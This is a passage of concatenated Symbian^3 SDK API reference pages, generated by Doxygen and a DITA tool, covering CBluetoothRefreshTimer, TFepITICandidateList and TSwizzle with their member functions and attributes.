class="topictitle2"> const TInt KResultPriorityCount </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KResultPriorityCount </td> <td> [static] </td> </tr> </table> <div class="section"> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
sdk/guid-6013a680-57f9-415b-8851-c4fa63356636/class_c_bluetooth_refresh_timer.html
warlordh/fork_Symbian
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>TB9.2 Example Applications: CBluetoothRefreshTimer Class Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <link href="doxygen.css" rel="stylesheet" type="text/css"/> <link type="text/css" rel="stylesheet" href="../css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="../css/sdl.css" media="screen"/> <!--[if IE]> <link href="../css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> </head> <body class="kernelguide"> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Product Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <!-- Generated by Doxygen 1.6.2 --> <div class="contents"> <h1>CBluetoothRefreshTimer Class Reference</h1><!-- doxytag: class="CBluetoothRefreshTimer" --> <p><a href="class_c_bluetooth_refresh_timer-members.html">List of all members.</a></p> <table border="0" cellpadding="0" cellspacing="0"> <tr><td colspan="2"><h2>Public Member Functions</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top">&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_c_bluetooth_refresh_timer.html#afb7e5ebedb0475a393d24030ce4b91e4">~CBluetoothRefreshTimer</a> ()</td></tr> <tr><td class="memItemLeft" align="right" valign="top">void&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_c_bluetooth_refresh_timer.html#a0198ef7e6c6f86cc29f32cbd0105e5d9">DoCancel</a> ()</td></tr> <tr><td class="memItemLeft" align="right" valign="top">void&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_c_bluetooth_refresh_timer.html#a35ac4274326e25348a4c1536c6b13943">RunL</a> ()</td></tr> <tr><td class="memItemLeft" align="right" valign="top">TInt&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_c_bluetooth_refresh_timer.html#a5dee58121e84aedaf3d21698add7216f">RunError</a> (TInt aError)</td></tr> <tr><td class="memItemLeft" align="right" valign="top">void&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_c_bluetooth_refresh_timer.html#a8f2c8cdde49f04754b4ed693228da3e0">StartL</a> ()</td></tr> <tr><td class="memItemLeft" align="right" valign="top">void&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_c_bluetooth_refresh_timer.html#a270c66a754cbb2acc85c2b87709192b0">StopWaitLoop</a> ()</td></tr> <tr><td class="memItemLeft" align="right" valign="top">void&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_c_bluetooth_refresh_timer.html#a8442cf6f32eb9cd6d10a0ca56fd8cada">SetRefreshTime</a> (TInt aRefreshTime)</td></tr> <tr><td colspan="2"><h2>Static Public Member Functions</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top">static <a class="el" href="class_c_bluetooth_refresh_timer.html">CBluetoothRefreshTimer</a> *&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_c_bluetooth_refresh_timer.html#a122b128888ef9a86b0a4710c1459b3e2">NewL</a> (<a class="el" href="class_c_shared_intermediator.html">CSharedIntermediator</a> *aSMediator, CActiveSchedulerWait *aWait)</td></tr> <tr><td class="memItemLeft" align="right" valign="top">static <a class="el" href="class_c_bluetooth_refresh_timer.html">CBluetoothRefreshTimer</a> *&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_c_bluetooth_refresh_timer.html#a10697495f27262ca4119892932cf5be3">NewLC</a> (<a class="el" href="class_c_shared_intermediator.html">CSharedIntermediator</a> *aSMediator, CActiveSchedulerWait *aWait)</td></tr> </table> <hr/><a name="_details"></a><h2>Detailed Description</h2> <p><a class="el" href="class_c_bluetooth_refresh_timer.html">CBluetoothRefreshTimer</a> refreshes bluetooth device list. </p> <p>Definition at line <a class="el" href="bluetoothrefreshtimer_8h_source.html#l00026">26</a> of file <a class="el" href="bluetoothrefreshtimer_8h_source.html">bluetoothrefreshtimer.h</a>.</p> <hr/><h2>Constructor &amp; Destructor Documentation</h2> <a class="anchor" id="afb7e5ebedb0475a393d24030ce4b91e4"></a><!-- doxytag: member="CBluetoothRefreshTimer::~CBluetoothRefreshTimer" ref="afb7e5ebedb0475a393d24030ce4b91e4" args="()" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">CBluetoothRefreshTimer::~CBluetoothRefreshTimer </td> <td>(</td> <td class="paramname"></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> <p>Destructor </p> <p>Definition at line <a class="el" href="bluetoothrefreshtimer_8cpp_source.html#l00038">38</a> of file <a class="el" href="bluetoothrefreshtimer_8cpp_source.html">bluetoothrefreshtimer.cpp</a>.</p> </div> </div> <hr/><h2>Member Function Documentation</h2> <a class="anchor" id="a122b128888ef9a86b0a4710c1459b3e2"></a><!-- doxytag: member="CBluetoothRefreshTimer::NewL" ref="a122b128888ef9a86b0a4710c1459b3e2" args="(CSharedIntermediator *aSMediator, CActiveSchedulerWait *aWait)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="class_c_bluetooth_refresh_timer.html">CBluetoothRefreshTimer</a> * CBluetoothRefreshTimer::NewL </td> <td>(</td> <td class="paramtype"><a class="el" href="class_c_shared_intermediator.html">CSharedIntermediator</a> *&nbsp;</td> <td class="paramname"> <em>aSMediator</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">CActiveSchedulerWait *&nbsp;</td> <td class="paramname"> <em>aWait</em></td><td>&nbsp;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td><td><code> [static]</code></td> </tr> </table> </div> <div class="memdoc"> <p><a class="el" href="class_c_bluetooth_refresh_timer.html#a122b128888ef9a86b0a4710c1459b3e2">NewL()</a></p> <p>discussion Create new <a class="el" href="class_c_bluetooth_refresh_timer.html">CBluetoothRefreshTimer</a> object param aSMediator a shared intermediator. param aWait a scheduler loop owner. return a pointer to the created instance of <a class="el" href="class_c_bluetooth_refresh_timer.html">CBluetoothRefreshTimer</a> </p> <p>Definition at line <a class="el" href="bluetoothrefreshtimer_8cpp_source.html#l00045">45</a> of file <a class="el" href="bluetoothrefreshtimer_8cpp_source.html">bluetoothrefreshtimer.cpp</a>.</p> </div> </div> <a class="anchor" id="a10697495f27262ca4119892932cf5be3"></a><!-- doxytag: member="CBluetoothRefreshTimer::NewLC" ref="a10697495f27262ca4119892932cf5be3" args="(CSharedIntermediator *aSMediator, CActiveSchedulerWait *aWait)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="class_c_bluetooth_refresh_timer.html">CBluetoothRefreshTimer</a> * CBluetoothRefreshTimer::NewLC </td> <td>(</td> <td class="paramtype"><a class="el" href="class_c_shared_intermediator.html">CSharedIntermediator</a> *&nbsp;</td> <td class="paramname"> <em>aSMediator</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">CActiveSchedulerWait *&nbsp;</td> <td class="paramname"> <em>aWait</em></td><td>&nbsp;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td><td><code> [static]</code></td> </tr> </table> </div> <div class="memdoc"> <p><a class="el" href="class_c_bluetooth_refresh_timer.html#a10697495f27262ca4119892932cf5be3">NewLC()</a> </p> <p>Definition at line <a class="el" href="bluetoothrefreshtimer_8cpp_source.html#l00054">54</a> of file <a class="el" href="bluetoothrefreshtimer_8cpp_source.html">bluetoothrefreshtimer.cpp</a>.</p> </div> </div> <a class="anchor" id="a0198ef7e6c6f86cc29f32cbd0105e5d9"></a><!-- doxytag: member="CBluetoothRefreshTimer::DoCancel" ref="a0198ef7e6c6f86cc29f32cbd0105e5d9" args="()" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void CBluetoothRefreshTimer::DoCancel </td> <td>(</td> <td class="paramname"></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> <p>DoCancelL()</p> <p>discussion Cancels the timer. </p> <p>Definition at line <a class="el" href="bluetoothrefreshtimer_8cpp_source.html#l00137">137</a> of file <a class="el" href="bluetoothrefreshtimer_8cpp_source.html">bluetoothrefreshtimer.cpp</a>.</p> </div> </div> <a class="anchor" id="a35ac4274326e25348a4c1536c6b13943"></a><!-- doxytag: member="CBluetoothRefreshTimer::RunL" ref="a35ac4274326e25348a4c1536c6b13943" args="()" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void CBluetoothRefreshTimer::RunL </td> <td>(</td> <td class="paramname"></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> <p><a class="el" href="class_c_bluetooth_refresh_timer.html#a35ac4274326e25348a4c1536c6b13943">RunL()</a></p> <p>discussion Implementation of the timer's virtual method. Check that all threads are alive and running, if not then restart them. </p> <p>Definition at line <a class="el" href="bluetoothrefreshtimer_8cpp_source.html#l00101">101</a> of file <a class="el" href="bluetoothrefreshtimer_8cpp_source.html">bluetoothrefreshtimer.cpp</a>.</p> </div> </div> <a class="anchor" id="a5dee58121e84aedaf3d21698add7216f"></a><!-- doxytag: member="CBluetoothRefreshTimer::RunError" ref="a5dee58121e84aedaf3d21698add7216f" args="(TInt aError)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">TInt CBluetoothRefreshTimer::RunError </td> <td>(</td> <td class="paramtype">TInt&nbsp;</td> <td class="paramname"> <em>aError</em></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> <p><a class="el" href="class_c_bluetooth_refresh_timer.html#a5dee58121e84aedaf3d21698add7216f">RunError()</a></p> <p>discussion Handles a leave occurring in the request completion event handler <a class="el" href="class_c_bluetooth_refresh_timer.html#a35ac4274326e25348a4c1536c6b13943">RunL()</a> return returns always KErrNone. </p> <p>Definition at line <a class="el" href="bluetoothrefreshtimer_8cpp_source.html#l00163">163</a> of file <a class="el" href="bluetoothrefreshtimer_8cpp_source.html">bluetoothrefreshtimer.cpp</a>.</p> </div> </div> <a class="anchor" id="a8f2c8cdde49f04754b4ed693228da3e0"></a><!-- doxytag: member="CBluetoothRefreshTimer::StartL" ref="a8f2c8cdde49f04754b4ed693228da3e0" args="()" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void CBluetoothRefreshTimer::StartL </td> <td>(</td> <td class="paramname"></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> <p><a class="el" href="class_c_bluetooth_refresh_timer.html#a8f2c8cdde49f04754b4ed693228da3e0">StartL()</a></p> <p>discussion Start searching for bluetooth devices. Activate refresh timer. </p> <p>Definition at line <a class="el" href="bluetoothrefreshtimer_8cpp_source.html#l00077">77</a> of file <a class="el" href="bluetoothrefreshtimer_8cpp_source.html">bluetoothrefreshtimer.cpp</a>.</p> </div> </div> <a class="anchor" id="a270c66a754cbb2acc85c2b87709192b0"></a><!-- doxytag: member="CBluetoothRefreshTimer::StopWaitLoop" ref="a270c66a754cbb2acc85c2b87709192b0" args="()" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void CBluetoothRefreshTimer::StopWaitLoop </td> <td>(</td> <td class="paramname"></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> <p><a class="el" href="class_c_bluetooth_refresh_timer.html#a270c66a754cbb2acc85c2b87709192b0">StopWaitLoop()</a></p> <p>discussion Stop active scheduler wait loop. </p> <p>Definition at line <a class="el" href="bluetoothrefreshtimer_8cpp_source.html#l00090">90</a> of file <a class="el" href="bluetoothrefreshtimer_8cpp_source.html">bluetoothrefreshtimer.cpp</a>.</p> </div> </div> <a class="anchor" id="a8442cf6f32eb9cd6d10a0ca56fd8cada"></a><!-- doxytag: member="CBluetoothRefreshTimer::SetRefreshTime" ref="a8442cf6f32eb9cd6d10a0ca56fd8cada" args="(TInt aRefreshTime)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void CBluetoothRefreshTimer::SetRefreshTime </td> <td>(</td> <td class="paramtype">TInt&nbsp;</td> <td class="paramname"> <em>aRefreshTime</em></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> <p><a class="el" href="class_c_bluetooth_refresh_timer.html#a8442cf6f32eb9cd6d10a0ca56fd8cada">SetRefreshTime()</a></p> <p>discussion Set new refresh time. param aRefreshTime a new refresh time in seconds. </p> <p>Definition at line <a class="el" href="bluetoothrefreshtimer_8cpp_source.html#l00147">147</a> of file <a class="el" href="bluetoothrefreshtimer_8cpp_source.html">bluetoothrefreshtimer.cpp</a>.</p> </div> </div> </div> <hr size="1"/><address style="text-align: right;"><small>Generated by&nbsp; <a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.6.2 </small></address> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
sdk/GUID-71ACACE5-4029-38A6-BA83-FB3C675913E6.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="cxxStruct" /> <meta name="DC.Title" content="TFepITICandidateList" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-71ACACE5-4029-38A6-BA83-FB3C675913E6" /> <title> TFepITICandidateList </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api" /> <link rel="stylesheet" type="text/css" href="cxxref.css" /> </head> <body class="cxxref" id="GUID-71ACACE5-4029-38A6-BA83-FB3C675913E6"> <a name="GUID-71ACACE5-4029-38A6-BA83-FB3C675913E6"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2518338 id2518347 id2420140 id2406431 id2406544 id2406715 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; </div> <h1 class="topictitle1"> TFepITICandidateList Struct Reference </h1> <table class="signature"> <tr> <td> struct TFepITICandidateList </td> </tr> </table> <div class="section"> <div> <p> ITI candidate list data </p> </div> </div> <div class="section member-index"> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Public Attributes </th> </tr> </thead> <tbody> <tr> <td align="right" valign="top"> union TFepITICandidateList::@319 </td> <td> <a href="#GUID-4983D9B9-8353-34A2-843F-8BEF80E00B4A"> @320 </a> </td> </tr> <tr class="bg"> <td align="right" valign="top"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-391D9E7E-5914-36CC-B530-539284A76B79"> iActiveIndex </a> </td> </tr> <tr> <td align="right" valign="top"> <a href="GUID-9EC9CD13-91FB-38F7-9E55-F41C584AC5A6.html"> CDesCArray </a> * </td> <td> <a href="#GUID-4B9A3ADE-6D8E-3103-B6EA-0D6F9D784101"> iItemArray </a> </td> </tr> <tr class="bg"> <td align="right" valign="top"> const <a href="GUID-FAEBF321-6B08-3041-A01F-B1E7282D0707.html"> RArray </a> &lt; <a href="GUID-8FE95467-D48B-3E61-9028-29C0F15F567E.html"> TPtrC </a> &gt; * </td> <td> <a href="#GUID-8064BC2A-27F7-37EF-A4B8-E20E1D610404"> iItemArray2 </a> </td> </tr> <tr> <td align="right" valign="top"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-46593B02-3A72-3EF5-A4E0-5344C3B45C4E"> iLangCode </a> </td> </tr> </tbody> </table> </div> <h1 class="pageHeading topictitle1"> Member Data Documentation </h1> <div class="nested1" id="GUID-4983D9B9-8353-34A2-843F-8BEF80E00B4A"> <a name="GUID-4983D9B9-8353-34A2-843F-8BEF80E00B4A"> <!-- --> </a> <h2 class="topictitle2"> union TFepITICandidateList::@319 @320 </h2> <table class="signature"> <tr> <td> union TFepITICandidateList::@319 </td> <td> @320 </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-391D9E7E-5914-36CC-B530-539284A76B79"> <a name="GUID-391D9E7E-5914-36CC-B530-539284A76B79"> <!-- --> </a> <h2 class="topictitle2"> TInt iActiveIndex </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> iActiveIndex </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-4B9A3ADE-6D8E-3103-B6EA-0D6F9D784101"> <a name="GUID-4B9A3ADE-6D8E-3103-B6EA-0D6F9D784101"> <!-- --> </a> <h2 class="topictitle2"> CDesCArray * iItemArray </h2> <table class="signature"> <tr> <td> <a href="GUID-9EC9CD13-91FB-38F7-9E55-F41C584AC5A6.html"> CDesCArray </a> * </td> <td> iItemArray </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-8064BC2A-27F7-37EF-A4B8-E20E1D610404"> <a name="GUID-8064BC2A-27F7-37EF-A4B8-E20E1D610404"> <!-- --> </a> <h2 class="topictitle2"> const RArray&lt; TPtrC &gt; * iItemArray2 </h2> <table class="signature"> <tr> <td> const <a href="GUID-FAEBF321-6B08-3041-A01F-B1E7282D0707.html"> RArray </a> &lt; <a href="GUID-8FE95467-D48B-3E61-9028-29C0F15F567E.html"> TPtrC </a> &gt; * </td> <td> iItemArray2 </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-46593B02-3A72-3EF5-A4E0-5344C3B45C4E"> <a name="GUID-46593B02-3A72-3EF5-A4E0-5344C3B45C4E"> <!-- --> </a> <h2 class="topictitle2"> TInt iLangCode </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> iLangCode </td> </tr> </table> <div class="section"> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
sdk/GUID-D10FA32F-32F7-3488-9AAC-CB95270EA006.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="cxxClass" /> <meta name="DC.Title" content="TSwizzle" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-D10FA32F-32F7-3488-9AAC-CB95270EA006" /> <title> TSwizzle </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api" /> <link rel="stylesheet" type="text/css" href="cxxref.css" /> </head> <body class="cxxref" id="GUID-D10FA32F-32F7-3488-9AAC-CB95270EA006"> <a name="GUID-D10FA32F-32F7-3488-9AAC-CB95270EA006"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2518338 id2518347 id2858858 id2430050 id2430449 id2430879 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; </div> <h1 class="topictitle1"> TSwizzle Class Reference </h1> <table class="signature"> <tr> <td> class TSwizzle : public TSwizzleBase </td> </tr> </table> <div class="section"> <div> <p> Maintains a dual representation for an object. The representation is: </p> <p> by stream id, if the object is not in memory (the stream contains the external representation of that object). </p> <p> by pointer, if the object is in memory. </p> <p> The template class defines the type of object for which the swizzle is a representation. Full access to the represented object is available through the swizzle. </p> <p> Maintaining a dual representation for an object allows the loading of objects into memory from a store to be deferred; this is particularly important in complex applications. </p> </div> </div> <div class="section derivation"> <h2 class="sectiontitle"> Inherits from </h2> <ul class="derivation derivation-root"> <li class="derivation-depth-0 "> TSwizzle <ul class="derivation"> <li class="derivation-depth-1 "> <a href="GUID-07317BA7-445B-3C6E-A569-D14D2934DB4C.html"> TSwizzleBase </a> <ul class="derivation"> <li class="derivation-depth-2 "> <a href="GUID-D1564E8B-3CE4-3B68-922D-107E8CE0E376.html"> TSwizzleCBase </a> </li> </ul> </li> </ul> </li> </ul> </div> <div class="section member-index"> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Public Member Functions </th> </tr> </thead> <tbody> <tr> <td align="right" class="code"> </td> <td> <a href="#GUID-E460B997-6396-3DD4-87EB-8EC1329E7411"> TSwizzle </a> () </td> </tr> <tr class="bg"> <td align="right" class="code"> </td> <td> <a href="#GUID-2F6A768C-2C82-3D03-B644-7E398907069D"> TSwizzle </a> (T *) </td> </tr> <tr> <td align="right" class="code"> </td> <td> <a href="#GUID-6537BB86-0A9C-3ECA-8F0C-F46A380E3083"> TSwizzle </a> ( <a href="GUID-1C4D4AFD-85E2-3D5D-B704-D1FA0E5E7DA2.html"> TStreamId </a> ) </td> </tr> <tr class="bg"> <td align="right" class="code"> T * </td> <td> <a href="#GUID-73FA9507-E3FB-3EC0-8B7B-EDE4869B7199"> AsPtr </a> () </td> </tr> <tr> <td align="right" class="code"> void </td> <td> <a href="#GUID-D83E2A30-5F8D-3EC5-AD32-79B49AC38D7E"> ExternalizeL </a> ( <a href="GUID-ADAC48A2-3D24-306B-9473-70201F4D351D.html"> RWriteStream </a> &amp;) </td> </tr> <tr class="bg"> <td align="right" class="code"> </td> <td> <a href="#GUID-E74F9911-A7F8-3A0D-B268-4DE1022CD756"> operator T * </a> () </td> </tr> <tr> <td align="right" class="code"> T &amp; </td> <td> <a href="#GUID-3B29DCA7-D161-3298-BD83-BC704984E197"> operator* </a> () </td> </tr> <tr class="bg"> <td align="right" class="code"> T * </td> <td> <a href="#GUID-B24AEF37-56B0-307D-902F-5EF004DCBF83"> operator-&gt; </a> () </td> </tr> <tr> <td align="right" class="code"> <a href="GUID-D10FA32F-32F7-3488-9AAC-CB95270EA006.html"> TSwizzle </a> &lt; T &gt; &amp; </td> <td> <a href="#GUID-3D9F90EA-6CA5-34BC-8EE0-8A7AFF084D7D"> operator= </a> (T *) </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Inherited Functions </th> </tr> </thead> <tbody> <tr> <td> </td> <td> <a href="GUID-07317BA7-445B-3C6E-A569-D14D2934DB4C.html"> TSwizzleBase::Ptr()const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-07317BA7-445B-3C6E-A569-D14D2934DB4C.html"> TSwizzleBase::TSwizzleBase() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-07317BA7-445B-3C6E-A569-D14D2934DB4C.html"> TSwizzleBase::TSwizzleBase(TAny *) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-07317BA7-445B-3C6E-A569-D14D2934DB4C.html"> TSwizzleBase::TSwizzleBase(TStreamId) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-D1564E8B-3CE4-3B68-922D-107E8CE0E376.html"> TSwizzleCBase::AsId()const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-D1564E8B-3CE4-3B68-922D-107E8CE0E376.html"> TSwizzleCBase::DoExternalizeL(RWriteStream &amp;,TExternalizer&lt; TAny &gt;)const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-D1564E8B-3CE4-3B68-922D-107E8CE0E376.html"> TSwizzleCBase::InternalizeL(RReadStream &amp;) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-D1564E8B-3CE4-3B68-922D-107E8CE0E376.html"> TSwizzleCBase::IsId()const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-D1564E8B-3CE4-3B68-922D-107E8CE0E376.html"> TSwizzleCBase::IsPtr()const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-D1564E8B-3CE4-3B68-922D-107E8CE0E376.html"> TSwizzleCBase::TSwizzleCBase() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-D1564E8B-3CE4-3B68-922D-107E8CE0E376.html"> TSwizzleCBase::TSwizzleCBase(TStreamId) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-D1564E8B-3CE4-3B68-922D-107E8CE0E376.html"> TSwizzleCBase::TSwizzleCBase(TStreamRef) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-D1564E8B-3CE4-3B68-922D-107E8CE0E376.html"> TSwizzleCBase::TSwizzleCBase(const TAny *) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-D1564E8B-3CE4-3B68-922D-107E8CE0E376.html"> TSwizzleCBase::operator!=(const TAny *)const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-D1564E8B-3CE4-3B68-922D-107E8CE0E376.html"> TSwizzleCBase::operator!=(const TSwizzleCBase &amp;)const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-D1564E8B-3CE4-3B68-922D-107E8CE0E376.html"> TSwizzleCBase::operator==(const TAny *)const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-D1564E8B-3CE4-3B68-922D-107E8CE0E376.html"> TSwizzleCBase::operator==(const TSwizzleCBase &amp;)const </a> </td> </tr> </tbody> </table> </div> <h1 class="pageHeading topictitle1"> Constructor &amp; Destructor Documentation </h1> <div class="nested1" id="GUID-E460B997-6396-3DD4-87EB-8EC1329E7411"> <a name="GUID-E460B997-6396-3DD4-87EB-8EC1329E7411"> <!-- --> </a> <h2 class="topictitle2"> TSwizzle() </h2> <table class="signature"> <tr> <td> TSwizzle </td> <td> ( </td> <td> ) </td> <td> [inline] </td> </tr> </table> <div class="section"> <div> <p> Constructs an uninitialised swizzle. It is necessary because there are also non-default constructors in this class. </p> </div> </div> </div> <div class="nested1" id="GUID-2F6A768C-2C82-3D03-B644-7E398907069D"> <a name="GUID-2F6A768C-2C82-3D03-B644-7E398907069D"> <!-- --> </a> <h2 class="topictitle2"> TSwizzle(T *) </h2> <table class="signature"> <tr> <td> TSwizzle </td> <td> ( </td> <td> T * </td> <td> aPtr </td> <td> ) </td> <td> [inline] </td> </tr> </table> <div class="section"> <div> <p> Constructs a swizzle for a class T type object, represented by a pointer. </p> <p> </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td 